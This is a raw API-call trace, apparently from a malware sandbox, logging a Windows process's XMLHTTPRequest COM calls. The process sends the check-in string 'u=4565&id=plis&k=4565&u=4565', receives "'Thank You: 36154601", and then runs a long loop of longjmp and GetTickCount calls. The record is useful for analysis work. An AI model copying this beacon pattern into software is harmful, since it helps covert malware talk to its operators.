	[0151.325] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7feff44d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ce18 | out: ppvObject=0x26ce18*=0x0) returned 0x80004002
	[0151.325] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7feff426f70*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ce20 | out: ppvObject=0x26ce20*=0x0) returned 0x80004002
	[0151.325] XMLHTTPRequest:IUnknown:AddRef (This=0x3cacc0) returned 0x2
	[0151.325] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40c8070*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d000 | out: ppvObject=0x26d000*=0x3cacc0) returned 0x0
	[0151.326] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26be20 | out: ppvObject=0x26be20*=0x3cacc0) returned 0x0
	[0151.326] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef40b9ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26be58 | out: ppvObject=0x26be58*=0x0) returned 0x80004002
	[0151.326] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), riid=0x7fef40d0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x26be48 | out: ppvObject=0x26be48*=0x0) returned 0x80004002
	[0151.326] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26be18 | out: ppvObject=0x26be18*=0x0) returned 0x80004002
	[0151.326] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26be18 | out: ppvObject=0x26be18*=0x0) returned 0x80004002
	[0151.326] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x3
	[0151.326] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40cbbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x26bef8 | out: ppvObject=0x26bef8*=0x0) returned 0x80004002
	[0151.326] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08c0*(Data1=0x118, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26bf08 | out: ppvObject=0x26bf08*=0x0) returned 0x80004002
	[0151.326] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26bef0 | out: ppvObject=0x26bef0*=0x3cacc0) returned 0x0
	[0151.326] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef40b9ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26bf20 | out: ppvObject=0x26bf20*=0x0) returned 0x80004002
	[0151.326] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40cbbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x26bef8 | out: ppvObject=0x26bef8*=0x0) returned 0x80004002
	[0151.326] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26bf00 | out: ppvObject=0x26bf00*=0x0) returned 0x80004002
	[0151.326] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26bf00 | out: ppvObject=0x26bf00*=0x0) returned 0x80004002
	[0151.326] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x3
	[0151.326] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0151.326] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26d018 | out: ppvObject=0x26d018*=0x3cacc0) returned 0x0
	[0151.327] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), ppvObject=0x26d010 | out: ppvObject=0x26d010*=0x0) returned 0x80004002
	[0151.327] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0151.327] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x1
	[0151.327] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26dbf0 | out: ppvObject=0x26dbf0*=0x0) returned 0x80004002
	[0151.327] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26dd90*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26db44 | out: rgDispId=0x26db44*=5) returned 0x0
	[0151.327] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x2
	[0151.327] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d8d0 | out: ppvObject=0x26d8d0*=0x0) returned 0x80004002
	[0151.327] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=5, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x26d8a8*(rgvarg=([0]=0x42be48*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42d9c0*(varType=0x8, wReserved1=0xa, wReserved2=0x0, wReserved3=0x0, varVal1="u=4565&id=plis&k=4565&u=4565", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26d8f0, puArgErr=0x26d8c0 | out: pDispParams=0x26d8a8*(rgvarg=([0]=0x42be48*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42d9c0*(varType=0x8, wReserved1=0xa, wReserved2=0x0, wReserved3=0x0, varVal1="u=4565&id=plis&k=4565&u=4565", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26d8f0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d8c0*=0x26dd90) returned 0x0
	[0151.327] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26cf48 | out: ppvObject=0x26cf48*=0x3cacc0) returned 0x0
	[0151.327] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7feff837e20*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x7feff837e20*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x5a52f98 | out: ppvObject=0x5a52f98*=0x0) returned 0x80004002
	[0151.327] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0151.328] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26ba48 | out: ppvObject=0x26ba48*=0x3cacc0) returned 0x0
	[0151.328] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7feff83f170*(Data1=0x4f9f9fcb, Data2=0xe0f4, Data3=0x48eb, Data4=([0]=0xb7, [1]=0xab, [2]=0xfa, [3]=0x2e, [4]=0xa9, [5]=0x36, [6]=0x5c, [7]=0xb4)), riid=0x7feff83f170*(Data1=0x4f9f9fcb, Data2=0xe0f4, Data3=0x48eb, Data4=([0]=0xb7, [1]=0xab, [2]=0xfa, [3]=0x2e, [4]=0xa9, [5]=0x36, [6]=0x5c, [7]=0xb4)), ppvObject=0x9fb58 | out: ppvObject=0x9fb58*=0x0) returned 0x80004002
	[0151.328] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0161.404] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x1
	[0161.404] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26dbf8 | out: ppvObject=0x26dbf8*=0x0) returned 0x80004002
	[0161.404] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26dd10*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26db4c | out: rgDispId=0x26db4c*=10) returned 0x0
	[0161.405] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x2
	[0161.405] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d8d0 | out: ppvObject=0x26d8d0*=0x0) returned 0x80004002
	[0161.405] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=10, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x26d8a8*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be60, pExcepInfo=0x26d8f0, puArgErr=0x26d8c0 | out: pDispParams=0x26d8a8*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be60*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="'Thank You: 36154601", varVal2=0x0), pExcepInfo=0x26d8f0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d8c0*=0x26dd90) returned 0x0
	[0161.405] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x1
	[0161.405] GetTickCount () returned 0x115f077
	[0161.405] GetTickCount () returned 0x115f077
	[0161.405] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d4a8 | out: ppvObject=0x26d4a8*=0x0) returned 0x80004002
	[0161.405] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26d5c0*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26d3fc | out: rgDispId=0x26d3fc*=7) returned 0x0
	[0161.405] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x3
	[0161.405] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d180 | out: ppvObject=0x26d180*=0x0) returned 0x80004002
	[0161.406] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=7, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x26d158*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be18, pExcepInfo=0x26d1a0, puArgErr=0x26d170 | out: pDispParams=0x26d158*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be18*(varType=0x3, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xc8, varVal2=0x0), pExcepInfo=0x26d1a0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d170*=0x0) returned 0x0
	[0161.406] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x2
	[0161.406] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0161.406] malloc (_Size=0xb0) returned 0x42e060
	[0161.408] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d4a8 | out: ppvObject=0x26d4a8*=0x0) returned 0x80004002
	[0161.408] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26d5c0*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26d3fc | out: rgDispId=0x26d3fc*=7) returned 0x0
	[0161.408] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x3
	[0161.408] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d180 | out: ppvObject=0x26d180*=0x0) returned 0x80004002
	[0161.408] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=7, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x26d158*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be18, pExcepInfo=0x26d1a0, puArgErr=0x26d170 | out: pDispParams=0x26d158*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be18*(varType=0x3, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xc8, varVal2=0x0), pExcepInfo=0x26d1a0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d170*=0xffffffff) returned 0x0
	[0161.408] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x2
	[0161.409] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x1
	[0161.409] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x0
	[0161.409] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0161.411] longjmp () 
	[0161.411] longjmp () 
	[0161.411] longjmp () 
	[0161.412] GetCurrentThreadId () returned 0x9a8
	[0161.412] GetCurrentThreadId () returned 0x9a8
	[0161.412] ??2@YAPEAX_K@Z () returned 0x3e4000
	[0161.412] malloc (_Size=0x80) returned 0x3c88b0
	[0161.412] longjmp () 
	[0161.412] longjmp () 
	[0161.412] longjmp () 
	[0161.412] longjmp () 
	[0161.412] longjmp () 
	[0161.413] GetTickCount () returned 0x115f077
	[0161.413] longjmp () 
	[0161.413] longjmp () 
	[0161.413] longjmp () 
	[0161.413] longjmp () 
	[0161.413] longjmp () 
	[0161.414] longjmp () 
	[0161.414] longjmp () 
	[0161.414] longjmp () 
	[0161.414] longjmp () 
	[0161.414] longjmp () 
	[0161.414] longjmp () 
	[0161.415] longjmp () 
	[0161.415] longjmp () 
	[0161.415] longjmp () 
	[0161.415] longjmp () 
	[0161.415] longjmp () 
	[0161.415] longjmp () 
	[0161.416] longjmp () 
	[0161.416] longjmp () 
	[0161.416] longjmp () 
	[0161.416] longjmp () 
	[0161.416] longjmp () 
	[0161.417] longjmp () 
	[0161.417] longjmp () 
	[0161.417] longjmp () 
	[0161.417] longjmp () 
	[0161.417] longjmp () 
	[0161.417] longjmp () 
	[0161.418] longjmp () 
	[0161.418] longjmp () 
	[0161.418] longjmp () 
	[0161.418] longjmp () 
	[0161.418] GetTickCount () returned 0x115f087
	[0161.418] longjmp () 
	[0161.418] longjmp () 
	[0161.419] longjmp () 
	[0161.419] longjmp () 
	[0161.419] longjmp () 
	[0161.419] longjmp () 
	[0161.419] longjmp () 
	[0161.419] longjmp () 
	[0161.420] longjmp () 
	[0161.420] longjmp () 
	[0161.420] longjmp () 
	[0161.420] longjmp () 
	[0161.420] longjmp () 
	[0161.420] longjmp () 
	[0161.421] longjmp () 
	[0161.421] longjmp () 
	[0161.421] longjmp () 
	[0161.421] longjmp () 
	[0161.421] longjmp () 
	[0161.421] longjmp () 
	[0161.422] longjmp () 
	[0161.422] longjmp () 
	[0161.422] longjmp () 
	[0161.422] longjmp () 
	[0161.422] longjmp () 
	[0161.423] longjmp () 
	[0161.423] longjmp () 
	[0161.423] longjmp () 
	[0161.423] longjmp () 
	[0161.423] longjmp () 
	[0161.424] longjmp () 
	[0161.424] longjmp () 
	[0161.424] GetTickCount () returned 0x115f087
	[0161.424] longjmp () 
	[0161.424] longjmp () 
	[0161.424] longjmp () 
	[0161.424] longjmp () 
	[0161.425] longjmp () 
	[0161.425] longjmp () 
	[0161.425] longjmp () 
	[0161.425] longjmp () 
	[0161.426] longjmp () 
	[0161.426] longjmp () 
	[0161.426] longjmp () 
	[0161.426] longjmp () 
	[0161.426] longjmp () 
	[0161.426] longjmp () 
	[0161.427] longjmp () 
	[0161.427] longjmp () 
	[0161.427] longjmp () 
	[0161.427] longjmp () 
	[0161.427] longjmp () 
	[0161.427] longjmp () 
	[0161.428] longjmp () 
	[0161.428] longjmp () 
	[0161.428] longjmp () 
	[0161.428] longjmp () 
	[0161.428] longjmp () 
	[0161.428] longjmp () 
	[0161.429] longjmp () 
	[0161.429] longjmp () 
	[0161.429] longjmp () 
	[0161.429] longjmp () 
	[0161.429] longjmp () 
	[0161.429] longjmp () 
	[0161.430] GetTickCount () returned 0x115f096
	[0161.430] longjmp () 
	[0161.430] longjmp () 
	[0161.430] longjmp () 
	[0161.430] longjmp () 
	[0161.431] longjmp () 
	[0161.431] longjmp () 
	[0161.431] longjmp () 
	[0161.431] longjmp () 
	[0161.431] longjmp () 
	[0161.431] longjmp () 
	[0161.432] longjmp () 
	[0161.432] longjmp () 
	[0161.432] longjmp () 
	[0161.432] longjmp () 
	[0161.432] longjmp () 
	[0161.432] longjmp () 
	[0161.432] longjmp () 
	[0161.433] longjmp () 
	[0161.433] longjmp () 
	[0161.433] longjmp () 
	[0161.433] longjmp () 
	[0161.433] longjmp () 
	[0161.433] longjmp () 
	[0161.434] longjmp () 
	[0161.434] longjmp () 
	[0161.434] longjmp () 
	[0161.434] longjmp () 
	[0161.434] longjmp () 
	[0161.434] longjmp () 
	[0161.435] longjmp () 
	[0161.435] longjmp () 
	[0161.435] longjmp () 
	[0161.435] GetTickCount () returned 0x115f096
	[0161.435] longjmp () 
	[0161.435] longjmp () 
	[0161.435] longjmp () 
	[0161.435] longjmp () 
	[0161.436] longjmp () 
	[0161.436] longjmp () 
	[0161.436] longjmp () 
	[0161.436] longjmp () 
	[0161.436] longjmp () 
	[0161.436] longjmp () 
	[0161.437] longjmp () 
	[0161.437] longjmp () 
	[0161.437] longjmp () 
	[0161.437] longjmp () 
	[0161.437] longjmp () 
	[0161.437] longjmp () 
	[0161.438] longjmp () 
	[0161.438] longjmp () 
	[0161.438] longjmp () 
	[0161.438] longjmp () 
	[0161.438] longjmp () 
	[0161.438] longjmp () 
	[0161.438] longjmp () 
	[0161.439] longjmp () 
	[0161.439] longjmp () 
	[0161.439] longjmp () 
	[0161.439] longjmp () 
	[0161.439] longjmp () 
	[0161.439] longjmp () 
	[0161.440] longjmp () 
	[0161.440] longjmp () 
	[0161.440] longjmp () 
	[0161.440] GetTickCount () returned 0x115f096
	[0161.440] longjmp () 
	[0161.440] longjmp () 
	[0161.440] longjmp () 
	[0161.440] longjmp () 
	[0161.441] longjmp () 
	[0161.441] longjmp () 
	[0161.441] longjmp () 
	[0161.441] longjmp () 
	[0161.441] longjmp () 
	[0161.442] longjmp () 
	[0161.442] longjmp () 
	[0161.442] longjmp () 
	[0161.442] longjmp () 
	[0161.442] longjmp () 
	[0161.442] longjmp () 
	[0161.443] longjmp () 
	[0161.443] longjmp () 
	[0161.443] longjmp () 
	[0161.443] longjmp () 
	[0161.443] longjmp () 
	[0161.443] longjmp () 
	[0161.444] longjmp () 
	[0161.444] longjmp () 
	[0161.444] longjmp () 
	[0161.444] longjmp () 
	[0161.444] longjmp () 
	[0161.444] longjmp () 
	[0161.444] longjmp () 
	[0161.445] longjmp () 
	[0161.445] longjmp () 
	[0161.445] longjmp () 
	[0161.445] longjmp () 
	[0161.445] GetTickCount () returned 0x115f0a6
	[0161.445] longjmp () 
	[0161.446] longjmp () 
	[0161.446] longjmp () 
	[0161.446] longjmp () 
	[0161.446] longjmp () 
	[0161.446] longjmp () 
	[0161.446] longjmp () 
	[0161.446] longjmp () 
	[0161.447] longjmp () 
	[0161.447] longjmp () 
	[0161.447] longjmp () 
	[0161.447] longjmp () 
	[0161.447] longjmp () 
	[0161.447] longjmp () 
	[0161.448] longjmp () 
	[0161.448] longjmp () 
	[0161.448] longjmp () 
	[0161.448] longjmp () 
	[0161.448] longjmp () 
	[0161.448] longjmp () 
	[0161.448] longjmp () 
	[0161.449] longjmp () 
	[0161.449] longjmp () 
	[0161.449] longjmp () 
	[0161.449] longjmp () 
	[0161.449] longjmp () 
